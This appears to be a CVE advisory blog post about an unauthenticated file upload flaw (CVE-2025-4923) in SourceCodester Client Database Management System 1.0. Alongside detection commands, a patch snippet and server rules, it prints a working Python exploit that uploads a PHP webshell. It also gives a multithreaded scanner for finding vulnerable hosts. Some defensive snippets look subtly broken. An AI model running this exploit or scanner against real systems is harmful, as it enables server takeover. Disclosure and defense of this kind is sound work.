SourceCodester Client Database Management System, Unrestricted File Upload, CVE-2025-4923 (Critical)

Listen to this Post

How CVE-2025-4923 Works

The vulnerability exists in the `/user_delivery_update.php` component of SourceCodester Client Database Management System 1.0. Attackers can exploit improper file validation in the `uploaded_file_cancelled` parameter to upload malicious files. The system fails to verify file types, extensions, or content, allowing arbitrary file uploads including PHP shells. Remote attackers leverage this to execute code on the server by uploading webshells. The vulnerability stems from missing authentication checks combined with insufficient input sanitization, enabling unauthenticated file uploads. Successful exploitation grants full server control with web user privileges.

DailyCVE Form

Platform: SourceCodester CDMS
Version: 1.0
Vulnerability: Unrestricted Upload
Severity: Critical
Date: 2025-05-28

Prediction: Patch by 2025-06-15

What Undercode Say:

Exploit POC for CVE-2025-4923
import requests
target = "http://victim.com/user_delivery_update.php"
shell = {
'uploaded_file_cancelled': ('undercode.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
response = requests.post(target, files=shell)
print(f"Shell uploaded to: {response.text}")
Detection command
grep -r "move_uploaded_file" /var/www/html/
find /var/www/html -name "user_delivery_update.php" -exec grep -l "uploaded_file_cancelled" {} \;
// Secure patch example
if(isset($_FILES['uploaded_file_cancelled'])) {
$allowed = ['image/jpeg','image/png'];
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo, $_FILES['uploaded_file_cancelled']['tmp_name']);
if(!in_array($mime, $allowed)) {
die("Invalid file type");
}
}
Web server protection
location ~ .php$ {
client_max_body_size 1M;
deny all;
}
-- Database cleanup
DELETE FROM deliveries WHERE file_path LIKE '%.php%';
Post-exploitation detection
find /var/www/html -name ".php" -mtime -7 -ls
grep -r "system(" /var/www/html/
Mass scanner
import requests
from concurrent.futures import ThreadPoolExecutor
def check_target(url):
try:
res = requests.get(f"{url}/user_delivery_update.php", timeout=5)
if res.status_code == 200:
return url
except:
pass
with open("targets.txt") as f:
targets = f.read().splitlines()
with ThreadPoolExecutor(50) as executor:
results = executor.map(check_target, targets)
for result in results:
if result: print(result)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top